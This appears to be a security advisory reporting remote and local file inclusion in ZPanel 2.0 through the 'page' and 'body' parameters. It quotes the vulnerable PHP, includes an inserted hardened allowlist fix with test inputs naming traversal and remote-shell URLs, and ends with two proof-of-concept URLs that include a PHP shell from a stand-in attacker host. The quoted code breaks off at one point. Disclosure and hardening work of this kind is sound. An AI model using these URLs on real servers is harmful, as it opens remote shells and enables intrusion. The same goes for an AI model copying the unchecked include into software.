http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel
Credit:
The information has been provided by Hamid Ebadi.
The original article can be found at: http://www.bugtraq.ir

Vulnerable Systems:
Version: ZPanel 2.0 (and below)
(also tested on ZPanel-v25-BETA11)

Description:
Input passed to the "page" parameter in "zpanel.php" and the "body" parameter in
"templates/ZPanelV2/template.php" isn't properly verified before it is used to include files.
This can be exploited to include arbitrary files from remote and local resources.
Vulnerable Code:
http://[host]/ZPanel/zpanel.php
// zpanel.php line : 21
if (!isset($_GET['page'])) {
    $body = "main.php";
} else {
    $body = $_GET['page'] . ".php";
}
// ...
// line : 38
// Loading template
$templatefolder = $row_Config['template'];
include('templates/'.$templatefolder.'/template.php');

http://[host]/ZPanel/templates/ZPanelV2/template.php
// template.php
// line : 63
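A hardened form of the page-selection logic above, added here as an example and not ZPanel's own code: the request value is used only as a key into a fixed allowlist and is never spliced into a path, and the template directory name taken from the configuration row is restricted to a single path component and checked with realpath before the include. ALLOWED_PAGES, resolve_page and resolve_template are hypothetical names, and the page names in the allowlist are constructed for illustration.

```php
<?php
// Added example (not ZPanel's own code): hardened replacement for the page
// selection at zpanel.php line 21 and the template include at line 38.
// Page names below are hypothetical; ZPanel's real page set is not on this page.

const ALLOWED_PAGES = [
    'main'    => 'main.php',
    'domains' => 'domains.php',
    'mail'    => 'mail.php',
];

// Map the ?page= value to a file name. Anything that is not a key in the map
// ("http://attacker/phpshell.txt?", "../../etc/passwd", "main%00", ...) is
// simply unknown and yields the default page; no string is ever built from it.
function resolve_page(?string $requested): string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_PAGES)) {
        return ALLOWED_PAGES['main'];
    }
    return ALLOWED_PAGES[$requested];
}

// Build the include path for the template directory named in the configuration
// row and refuse anything that does not resolve to a file under $baseDir/templates.
// Returns null when the name is not acceptable, so the caller can fail closed.
function resolve_template(string $baseDir, string $templateName): ?string
{
    // Exactly one directory component: no separators, no traversal, no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $templateName)) {
        return null;
    }
    $root      = realpath($baseDir . '/templates');
    $candidate = realpath($baseDir . '/templates/' . $templateName . '/template.php');
    if ($root === false || $candidate === false) {
        return null;
    }
    // realpath() removed symlinks and "..": require the result to stay under $root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed sample inputs, so the file can be run stand-alone.
assert(resolve_page('domains') === 'domains.php');
assert(resolve_page(null) === 'main.php');
assert(resolve_page('http://attacker/phpshell.txt?') === 'main.php');
assert(resolve_page('../../../../etc/passwd') === 'main.php');
assert(resolve_template(__DIR__, '../../etc') === null);
assert(resolve_template(__DIR__, 'ZPanelV2/../x') === null);
assert(resolve_template(__DIR__, 'http://attacker') === null);

// How the original lines would read after the change (fails closed when the
// template row is missing or malformed instead of including whatever it names).
$row_Config = $row_Config ?? ['template' => 'ZPanelV2']; // constructed sample row
$body       = resolve_page($_GET['page'] ?? null);
$template   = resolve_template(__DIR__, (string) ($row_Config['template'] ?? ''));
if ($template === null) {
    http_response_code(500);
    exit('template not available');
}
// $body is handed to the template as a variable; template.php must use it as
// set here and must not re-read it from $_GET['body'] (the second injection point).
include $template;
```

The same rule covers the second injection point: template.php should only use the $body variable computed in zpanel.php, never a value re-read from the request. Setting allow_url_include=Off in php.ini (the default since PHP 5.2) blocks the remote case at the interpreter level, but it does nothing against local file inclusion, which is why the allowlist is the primary control and the php.ini setting is only defence in depth.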
POC exploit:
http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt?
http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt?
# http://www.bugtraq.ir